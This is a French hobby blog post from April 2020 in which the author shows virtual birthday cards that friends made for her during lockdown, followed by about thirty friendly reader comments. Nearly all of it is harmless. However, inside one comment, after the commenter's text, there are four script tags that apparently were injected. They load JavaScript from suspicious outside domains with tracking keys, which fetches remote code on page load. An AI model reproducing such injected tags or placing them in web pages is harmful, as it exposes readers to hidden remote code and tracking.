• Vos Créas pour mon Anniv

     

     

    Vos Créas pour mon Anniv

     

     

    A Retrouver dans la Rubrique "Bal"-"Divers"  ICI

     

     

    Bonjour tout le monde,

    On se retrouve aujourd'hui pour vous montrer les créas que certaines d'entre vous ont faites à l'occasion de mon anniversaire qui m'ont beaucoup touchée autant que les sms, messages facebook, cartes virtuelles, mails que j'ai reçus...

    Pour celles qui m'ont envoyé du courrier, sachez que je vous avertirai quand ça sera arrivé mais ne paniquez pas.... Mon facteur est en confinement et la seule fois de la semaine où il passe.... Pour l'instant, il ne s'arrête pas chez moi...

     

     

    Voici dont vos merveilles...

     

     

    Vos Créas pour mon Anniv

     

     

    Je commence avec Ambrounette qui m'avait envoyé, avant mon Anniversaire, une créa pour Pâques....

     

     

     

     

    Vos Créas pour mon Anniv

     

     

     

     

    Vos Créas pour mon Anniv

     

     

    Pour visiter son blog... ICI

     

     

     

     

    Vos Créas pour mon Anniv

     

     

     

     

    Voici ce que m'ont envoyé Hélène, Marie-Jo, Patounette par l'intermédiaire du blog de Patounette...

     

     

     

     

    Vos Créas pour mon Anniv

     

     

     

     

    Vos Créas pour mon Anniv

     

     

     

     

    Vos Créas pour mon Anniv

     

     

    Pour visiter le blog de Patounette et ses Amies... ICI

     

     

    Vos Créas pour mon Anniv

     

     

    De Passerose...

     

     

     

     

    Vos Créas pour mon Anniv

     

     

    Pour Visiter son Blog.... ICI

     

     

    Vos Créas pour mon Anniv

     

     

     

    De Maïté...

     

     

     

     

    Vos Créas pour mon Anniv

     

     

     

     

    Vos Créas pour mon Anniv

     

     

    Pour visiter son Blog c'est ICI

     

     

    Vos Créas pour mon Anniv

     

     

    D’Élise...

     

     

    Vos Créas pour mon Anniv

     

     

    Pour Visiter son blog c'est ICI

     

     

    Vos Créas pour mon Anniv

     

     

    Les filles, du fond du cœur je vous dis

     

     

    Vos Créas pour mon Anniv

     

     

     

    A Retrouver dans la Rubrique "Merci"-"Divers"  ICI

     

     

     

    N'hésitez pas à cliquer et visiter leur univers respectif♥♥♥

     

     

     

    Vos Créas pour mon Anniv

     

     

     

     

    Vos Créas pour mon Anniv

     

     


    Tags Tags : , , , ,
  • Commentaires

    32
    Samedi 2 Mai 2020 à 11:18
    Dane

    beaucoup de talents dans la réalisations de ces cartes bravo c' est superbe bisous et joyeux anniv , bisous bisous

    31
    Samedi 25 Avril 2020 à 09:45

    voila un beau bouquet de carte virtuelle bravo a tes amies

    bisous

    30
    Jeudi 23 Avril 2020 à 09:36

    Tes aminettes t'ont joliment gâtée. Bonne journée. Bisous

    29
    qinoa
    Jeudi 23 Avril 2020 à 09:22

    je suis en admiration devant tant de belles choses faites par ordi et que je ne sais absolument pas faire.

    bzz et douce journée

    28
    Mercredi 22 Avril 2020 à 23:25

    Bravo aux créatrices pour toutes ces cartes et cadeaux, tu est bien gâtée ma carte partira plus tard

    Gros bisous Pierrette67

    27
    Mercredi 22 Avril 2020 à 19:47

    Bonsoir ma chère Valie

    Une bonne et douce soirée en espérant que tu vas bien ainsi que ta famille

    gros bisous d'amitié

    Janine

    26
    Mercredi 22 Avril 2020 à 19:13

    De belles attentions, vivement que les autres arrivent ... 
    Bravo aux talentueuses créatrices
    Gros Bisous 

    25
    Mercredi 22 Avril 2020 à 14:10

    902 - Chat et papillon -Tu as eu du bien joli courrier Valie et c'est très bien..Tu sais que l'Amitié que tu offres sans cesse et un vrai bijou et ça ne s'oublie jamais...Merci a Toi pour ta jolie présence...Mille bisous du coeur.

    A bientôt ma tit Douce...mon Coeur est avec Toi.

    24
    winie166
    Mercredi 22 Avril 2020 à 11:28

    des créations reçues ! super ! je n envoie rien pour la poste maintenant

    bisous

    23
    Mercredi 22 Avril 2020 à 11:20

    De superbes images virtuelles de tes copines. Heureusement qu'il y avait ça (en plus des autres cadeaux de ta famille) ! 

    Bises

    thaly

    22
    Jacline-H-49
    Mercredi 22 Avril 2020 à 09:22

    Bonjour chère Valie,

    Je suis heureuse pour toi, de te voir gâtée ainsi, toutes ces cartes plus belles les unes que les autres, et celles qui ne sont pas encore arrivées, qui le seront tout autant.

    Bonne journée même grise il faut bien la passer, le plus agréablement possible, mais je te fais confiance, tu vas encore faire des merveilles dans ta petite entreprise.

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    21
    Mercredi 22 Avril 2020 à 08:47

    Je suis en admiration devant toutes ces magnifiques créations ! Bravo à toutes !

    Bisous bisous !

    20
    Mardi 21 Avril 2020 à 22:09

    C'est bien joli toutes ces créations,

    coup de coeur pour celle de Passerose.

    bonne soirée ; bisous / Nicole

     
     
    19
    gaelle
    Mardi 21 Avril 2020 à 19:28
    de tres belles cartes virtuelles de tes amies biz gaelle
    18
    Mardi 21 Avril 2020 à 18:16

    De superbes cartes virtuelles, je suis contente pour toi, félicitations aux copinettes.

    Mon courrier pour toi est en attente...pff !

    Gros bisous, bonne continuation.

    17
    Mardi 21 Avril 2020 à 17:45
    Très jolies créas. Bravo aux créatrices.
    Gros bisous Béa
    16
    Mardi 21 Avril 2020 à 16:14

    Bonjour ma chère Valie

    Tu as reçu de bien belles cartes de tes amies

    J'espère que tu vas bien et je te souhaite une bonne

    après-midi ! gros bisous d'amitié

    Janine

     

    15
    Mardi 21 Avril 2020 à 14:33

    de bien jolies créas, bravo à tes amies! Bisous Nadine

    14
    Mardi 21 Avril 2020 à 13:37

    ympa de la part des copines !

    Bonne journée.
    Bises.

    13
    Mardi 21 Avril 2020 à 12:29

      bravo  à  toutes pour  ces  belles  attentions 

      gros  bisous

    12
    Mardi 21 Avril 2020 à 12:27

    Joliment gâtée par tes copinettes avec ces belles cartes virtuelles!! Bravo à toutes.....

    Bisous et douce journée

    11
    marianne
    Mardi 21 Avril 2020 à 11:56

    Waouh, que de jolies merveilles, c'est de toute beauté, bravo les filles !!

    Ta grosse dodue n'est pas encore partie, j'attends

    Gros bisous

    Marianne

    10
    mamijojo77100
    Mardi 21 Avril 2020 à 11:27

    BRAVO pour ces jolies creations virtuelles.. Au moins celles ci ne risquent pas d etre egarees. je croise les doigts pour que mes envois arrivent ces temps prochains..!!   gros bisous et a bientot de bonnes nouvelles.. JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1587461125732" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    9
    Mardi 21 Avril 2020 à 11:06
    Qu ils sont beaux tous ces gifs bravo a toutes et encore joyeux anniversaire bisous
    8
    Mardi 21 Avril 2020 à 10:58

    très jolies partages de tes amis bonne journée bisous

    7
    Mardi 21 Avril 2020 à 10:48

    Toujours bien gâtée, mais tu le mérite bien 

    Merci de nous avoir fait partager avec toi de ces belles créas

    Passe une bonne journée, nous c'est plein soleil

    Bisous

    6
    Jour de mai
    Mardi 21 Avril 2020 à 10:30

    Coucou Valie, 

    Merci pour ce magnifique partage mais je ne suis pas étonnée de voir tout cela. Tu le mérites bien et j'en suis ravie pour toi et malgré ces temps atypiques, on voit que la blogosphère fonctionne très bien. Hélas le courrier est plus incertain même si j'ai entendu ce matin que la distribution du courrier se ferait sur 4 jours (Mardi, Mercredi, Jeudi et Vendredi), alors peut-être une chance de recevoir du courrier pour ton anniversaire même en retard. 

    Très belle journée à toi avec les tiens et surtout de très gros bisous ♥♥♥

    LN

    5
    Jeannine (cristal24)
    Mardi 21 Avril 2020 à 10:18

    Coucou Valie,

    Très jolies créations reçues.

    Je regrette de ne pas avoir pu te souhaiter ton anniversaire, je n'ai pas mon carnet des anniversaires avec moi. Mais dès mon retour, je me rattraperai.

    Alors bon anniversaire en retard, en attendant ma carte.

    Il me tarde de me retrouver dans mon "chez moi", même si je ne suis pas malheureuse là où je suis en ce moment. Je commence à avoir des coups de cafard.

    Vivement le 11 mai....ou peut être avant.

    C'est bien la première fois que j'aimerais que le temps passe plus vite, pour qu'on soit sorti de cette mauvaise passe.

    Bonne continuation à toi.

    A bientôt.  bises.

    Jeannine

     

    4
    Mardi 21 Avril 2020 à 09:49

    Très belles cartes de la part de tes Amies, Bravo à toutes !!!

    Agréable journée ma tite Valie.

    Mille Bisous tout doux.

    3
    Mardi 21 Avril 2020 à 09:45

    Je suis très heureuse que tu ais été ainsi gaté ma gentille Valie, tu le mérite tu fais partie des amies d Eklablog que l on ne peut oublier, car créative, sans histoire et surtout blog de partage merci pour tout et surtout merci à toutes ces belles amies que je connais qui font partie aussi de mes amies bisous d un jour très pluvieux

    2
    Mardi 21 Avril 2020 à 08:55

    de très belles créas , tu le mérites

    bonne journée

    bisous

    1
    Mardi 21 Avril 2020 à 08:45

    magnifique ! bravo aux créatrices ! la mienne part ce matin ...avec 10 autres ! j'espère quelles arriveront toutes 

    bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :